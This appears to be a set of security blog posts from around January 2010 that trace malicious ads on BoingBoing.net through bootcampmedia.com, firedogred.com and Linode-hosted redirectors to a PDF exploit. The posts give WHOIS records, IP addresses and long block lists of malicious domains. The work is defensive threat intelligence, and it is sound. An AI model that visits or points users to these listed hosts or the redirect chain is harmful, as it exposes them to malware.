Last Updated on: 24-Jul-09

Administrative Contact:
Owner, Domain trafficbuyer@gmail.com
15156 SW 5th
Scottsdale, Arizona 85260
United States
+1.8005551212 Fax --

Technical Contact:
Owner, Domain trafficbuyer@gmail.com
15156 SW 5th
Scottsdale, Arizona 85260
United States
+1.8005551212 Fax --

Domain servers in listed order:
NS45.DOMAINCONTROL.COM
NS46.DOMAINCONTROL.COM

A search for the IP addresses show Linode is providing most of the infrastructure (again) with ezzi.net providing the payload server.

ad.zoombanner.com
69.164.215.205, 69.164.215.204 [Linode]

deliver.commismanderakis.com
74.207.232.205, 74.207.232.206, 74.207.232.248, 74.207.232.249, 74.207.232.250, 74.207.232.25, 74.207.232.30, 74.207.232.31, 74.207.232.35, 74.207.232.39, 74.207.232.202, 74.207.232.203 [Linode]

content.fishpotboutademalled.com
69.164.196.55 [Linode]

jduvazuc.info
216.150.79.74 [AccessIT / ezzi.net]

Incidentally, 69.164.196.55 also hosts a bunch of domains which are probably malicious:

• Aspoutceringlapham.com
• Baalcootymalachi.com
• Bangywhoaswaikiki.com
• Bertbleepedupsurge.com
• Bluegumgodfulfrowzly.com
• Bookletjigsawsenam.com
• Boursesdeployporomas.com
• Cabullacoexertstephen.com
• Camastuthbroomer.com
• Camocaexcidealaric.com
• Cursarophitkamass.com
• Dunnishbribesteen.com
• Dusaexsurgeenzed.com
• Eelfishminibusdaniel.com
• Enyopensilflux.com
• Fishpotboutademalled.com
• Galasynjingkoendoss.com
• Gombayuranidetripper.com
• Haileschoralephydra.com
• Haredjuvenalalkyds.com
• Hoofishsmutsdela.com
• Jigmenbrasschaves.com
• Jumnamontanodillon.com
• Limanadernaggly.com
• Malabarvoiotiahsln.com
• Mashlampeasewahima.com
• Miauwbustianraynold.com
• Mowewindsortejo.com
• Nahshufrosterpappus.com
• Negreetflurtagma.com
• Nitrotowelvidovic.com
• Oaterhabeasroyalet.com
• Ospswraxledfummel.com
• Oundycelticrecomb.com
• Pcdosbahnerdalea.com
• Pealedlupulicdunker.com
• Polarlyfoetiskart.com
• Potwareabipondeana.com
• Psatchargeehewart.com
• Puddyolderrippon.com
• Sallierdiaushawed.com
• Sarddieterchuted.com
• Scullogmooerslarking.com
• Siwardupttorntrib.com
• Skouthlazordurning.com
• Suttenbnetifla.com
• Tacomanheathsdisodic.com
• Temperabiceswayaka.com
• Teughlyhesperegerek.com
• Toterterrenobrasero.com
• Vaccarykakkakcaddoan.com
• Viperanmeatsoths.com
• Viznomyboohoorigs.com
• Voluntyseventechny.com
• Wartedbiterhunter.com
• Woodardvirgetoruli.com
• Yawybottlersuccahs.com
• Zirklehalavahhaunchy.com

I suspect that you probably wouldn't miss much by null-routing Linode completely at the moment.

More malvertisment domains

The malicious ads were running through (and I understand now terminated by) bootcampmedia.com, related to this post, according to commenter cerdo:

Blogger cerdo said...

bootcampmedia.com was also likely hosting a malicious campaign yesterday afternoon, and perhaps still ongoing. I'd contact you Jamie, but I don't have contact info for you. This all is clearly closely related to Dynamoo's post...

traffic.worldseescolor.com is an obvious bad actor. The other related domains:
deliver.bailagequinismregrow.com
img.bailagequinismregrow.com
content.cabullacoexertstephen.com

as well as:
aanserver88.com
bonnapet.com
afkenai.com
bfskul.com

14 January 2010 18:40

Blogger cerdo said...

Yep - saw traffic.worldseescolor.com via bootcamp again less than 30 minutes ago.

Related sites, accessed immediately after traffic.worldseescolor.com:

deliver.boaterdunnagechicot.com
img.boaterdunnagechicot.com

14 January 2010 18:45

Worth checking your logs for and blocking in case they turn up on another network. Checking IPs comes up with:

traffic.worldseescolor.com
69.164.215.208, 69.164.215.210, 69.164.215.205, 69.164.215.207, 69.164.215.204 [Linode]

deliver.bailagequinismregrow.com
74.207.232.205, 74.207.232.250, 74.207.232.249, 74.207.232.248, 74.207.232.203, 74.207.232.30, 74.207.232.206, 74.207.232.31, 74.207.232.39, 74.207.232.25, 74.207.232.202, 74.207.232.35 [Linode]

img.bailagequinismregrow.com
174.143.243.220, 98.129.238.102, 98.129.238.106, 98.129.236.239, 174.143.245.236, 98.129.237.14, 174.143.242.109, 174.143.243.90, 98.129.236.154, 98.129.238.101, 98.129.238.112, 98.129.236.254, 174.143.241.174, 98.129.238.105, 98.129.238.103, 174.143.243.162, 174.143.242.58, 98.129.238.99
[Slicehost / Rackspace]

content.cabullacoexertstephen.com
69.164.196.55 [Linode]

aanserver88.com
67.225.149.152 [Liquid Web]

bonnapet.com
Was 217.20.114.40 [Netdirekt / internetserviceteam.com] now appears to be down.

afkenai.com
195.2.253.93 [Madet Ltd, Moscow]

bfskul.com
195.2.253.93 [Madet Ltd, Moscow]

I don't have the full trace of these, so it's not exactly clear what these domains are doing in the reported chain.

More on malvertisements running through Bootcampmedia.com

Sandi at Spyware Sucks has a closer look at the malvertisements running through Bootcampmedia.com and comes up with some more details, following up from this post yesterday.

In this case the endpoint of the infection has switched to bonnapet.com hosted on 217.20.114.40 which is hosted by netdirekt e.K. / internetserviceteam.com, hardly surprising as they are one of the more common havens for crimeware. The internetserviceteam.com name appears to be a sub-brand used for black hat hosting .. perhaps it is time for a visit from the Bundespolizei?

BoingBoing.net / Bootcampmedia.com ad leads to malware

A malicious ad running on BoingBoing.net is delivering visitors to a PDF exploit.

Given the complicated state of advertising arbitrage, it is unlikely that BoingBoing.net have much control over it. The ad appears to be loading in from ad.yieldmanager.com (which is Yahoo!) and/or ad.z5x.net (DSNR Media Group) both of which are hosted on the same multihomed IP addresses.

The ad itself (pictured) appears to be some sort of get-rich-quick scheme or other.

This ad then directs through ads.bootcampmedia.com/servlet/ajrotator/790744/0/vh?z=BootCamp&dim=335848 to traffic.firedogred.com/content?campaign=1219131&sz=2 (this combination of bootcampmedia.com and firedogred.com has been noted before)

The ad then hops to deliver.amerchibchapowered.com/rotate?m=5;b=2;c=1;z=243826 then content.baalcootymalachi.com/track/3388182/S_SE?[snip] loading an image from img.amerchibchapowered.com along the way.

Finally, the visitor is directed to chohivyb.info/cgi-bin/aer/[snip] which contains an exploit detected as Troj/PDFJs-GI by Sophos.

"Boot Camp Media" is run by a guy called Jamie Dalgetty of Guelph, Ontario in Canada. It's unlikely that he's a bad guy, more likely that his ad network is being exploited by a malcious third party.

traffic.firedogred.com is rather more interesting, multihomed on 69.164.215.204, 69.164.215.205, 69.164.215.207, 69.164.215.208 and 69.164.215.210 at Linode, New Jersey. The domain firedogred.com is slightly interesting:

Registrant:
Domain Owner
15156 SW 5th
Scottsdale, Arizona 85260
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)

Domain Name: FIREDOGRED.COM
Created on: 15-Sep-09
Expires on: 15-Sep-10
Last Updated on: 15-Sep-09

Administrative Contact:
Owner, Domain trafficbuyer@gmail.com
15156 SW 5th
Scottsdale, Arizona 85260
United States
(800) 555-1212 Fax --

Technical Contact:
Owner, Domain trafficbuyer@gmail.com
15156 SW 5th
Scottsdale, Arizona 85260
United States
(800) 555-1212 Fax --

Domain servers in listed order:
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM

trafficbuyer@gmail.com has been used for these malicious domains for some months and is well known.

deliver.amerchibchapowered.com is also multihomed at Linode on 74.207.232.250, 74.207.232.25, 74.207.232.30, 74.207.232.31, 74.207.232.35, 74.207.232.39, 74.207.232.202, 74.207.232.203, 74.207.232.205, 74.207.232.206, 74.207.232.248 and 74.207.232.249. The domain was registered on 7th January 2010 and is hidden by DomainsByProxy.

content.baalcootymalachi.com is hosted on 69.164.196.55 at Linode again, again registered on 7th January via DomainsByProxy.

img.amerchibchapowered.com is hosted on a large number of servers at 174.143.243.90, 174.143.243.162, 174.143.243.220, 174.143.245.236, 98.129.236.154, 98.129.236.239, 98.129.236.254, 98.129.237.14, 98.129.238.99, 98.129.238.101, 98.129.238.102, 98.129.238.103, 98.129.238.105, 98.129.238.106, 98.129.238.112, 174.143.241.174, 174.143.242.58, 174.143.242.109 - these are all hosted at Slicehost.com which is a customer of Rackspace.

Finally, chohivyb.info is hosted on 216.150.79.74 which is some outfit called ezzi.net of New York owned by another outfit called AccessIT. No prizes for guessing that chohivyb.info has been registered only very recently with anonymous details.

216.150.79.74 is a well-known malware server, and that hosts the following domains which you can assume are malicious:

• Ablxsr.info
• Ajgdrt.info
• Alevfq.info
• Alfwqr.info
• Alrpsl.info
• Ameronada.info
• Bnzbfz.info
• Bodxmt.info
• Bplimo.info
• Briliantio.info
• Bvqlag.info
• Bzjsqk.info
• Ccwarj.info
• Cityopicos.info
• Clthth.info
• Ctksji.info
• Dasyxe.info
• Dbivoh.info
• Dgltup.info
• Dpuefh.info
• Dtjblp.info
• Enhmqq.info
• Enqpqk.info
• Euespj.info
• Exmxfd.info
• Fblooe.info
• Fdwghs.info
• Fopqde.info
• Fprvsu.info
• Frgbat.info
• Fymjjz.info
• Gelvmf.info
• Gnautw.info
• Gnysgg.info
• Gredotcom.info
• Grupodanot.info
• Grxqog.info
• Gukuny.info
• Gyckjq.info
• Hagijd.info
• Haqdsc.info
• Hgtbng.info
• Hjdnps.info
• Hyiyyi.info
• Iakecg.info
• Iaoaxz.info
• Iewwpn.info
• Ijaflj.info
• Iohbvo.info
• Jhrubd.info
• Jokirator.info
• Kbwstb.info
• Kibfsz.info
• Klamniton.info
• Ktebkx.info
• Kxlglw.info
• Leeloe.info
• Lgcezx.info
• Lkraat.info
• Lktcaj.info
• Llchqs.info
• Lnmrjz.info
• Lokitoreni.info
• Lqhczk.info
• Lywavy.info
• Lyzocu.info
• Mallstern.info
• Manaratora.info
• Megafrontan.info
• Mesxql.info
• Mngmjc.info
• Monsatrik.info
• Montrealt.info
• Mruvienno.info
• Mrvsnq.info
• Nalszu.info
• Ncnzfh.info
• Neiaea.info
• Nigrandara.info
• Njcmug.info
• Npmkrr.info
• Ntaxkj.info
• Obzdkn.info
• Ocftfa.info
• Optugj.info
• Otfcco.info
• Owpwhi.info
• Pbrugb.info
• Plxxii.info
• Pncgfd.info
• Ppusmb.info
• Prbakn.info
• Qdinql.info
• Qgxelo.info
• Qqtwft.info
• Realuqitor.info
• Refrentora.info
• Retuvarot.info
• Rfouce.info
• Rljysj.info
• Rocqdn.info
• Roeaaj.info
• Semqef.info
• Snosrz.info
• Spgsgh.info
• Stqvqw.info
• Swrapz.info
• Tcoqgo.info
• Tehfnn.info
• Top-lister1.info
• Transforltd.info
• Tsfxzg.info
• Tyenxv.info
• Ugrdzf.info
• Uliganoinc.info
• Urupnk.info
• Utpxno.info
• Uyguau.info
• Vbqfdm.info
• Veqibp.info
• Vkfaao.info
• Vwwtlp.info
• Wddifv.info
• Wdhcvv.info
• Wdokxd.info
• Wevoratora.info
• Wtstds.info
• Wvkjxx.info
• Wvlsam.info
• Xbhmws.info
• Xbxynl.info
• Xcisup.info
• Xxiyrv.info
• Ybeaxd.info
• Yfntrg.info
• Yqjxkj.info
• Ywbxen.info
• Zdkaki.info
• Zhwtqz.info
• Zlpbha.info
• Znkwjc.info
• Zqpwco.info

Unlocker.org.uk is located on the same server, but it doesn't seem to fit in with the malware delivery and perhaps it is best to assume that it is a coincidence.

Obviously block or null-route these destinations as you feel fit, and do not purchase any ads from firedogred.com!

Added: You probably want to block these too..

216.150.79.76

• Cacorq.info
• Clxhbz.info
• Dgrxqh.info
• Diwiowano.info
• Dmdurz.info
• Funkol.info
• Geetol.info
• Gitoer.info
• Gondiroda.info
• Gutrandin.info
• Hizfek.info
• Hopore.info
• Ivgzda.info
• Jopqae.info
• Kolpao.info
• Nadotraza.info
• Niraynome.info
• Ofahitino.info
• Oirjsa.info
• Ornotivec.info
• Pirtaf.info
• Popsto.info
• Rellok.info
• Ruhcsy.info
• Sacmtf.info
• Sdoras.info
• Tapiroten.info
• Tiizwb.info
• Traxemere.info
• Ulmqmq.info
• Vivibt.info
• Xsxydj.info
• Yuncdjbiw.info
• Yyoqny.info

216.150.79.77

• Bnodas.info
• Brasilianstoree.info
• Byzypub.info
• Depahugu.info
• Gionasodor.info
• Giratunes.info
• Gyreal.info
• Hlopki.info
• Huerin.info
• Igerinsar.info
• Jcafuzixa.info
• Joketarona.info
• Koevoru.info
• L-iza.info
• Laryju.info
• Manocoraz.info
• Nbuuf.info
• Npefu.info
• Nvihobepo.info
• Pe-aqemop.info
• Pyneh.info
• Retiof.info
• Rzajexu.info
• Tolkienad.info
• Tymane.info
• Typolazu.info
• Vfoxoe.info
• Wanitale.info
• Yawibyve.info
• Ydiuvy.info
• Zoimie.info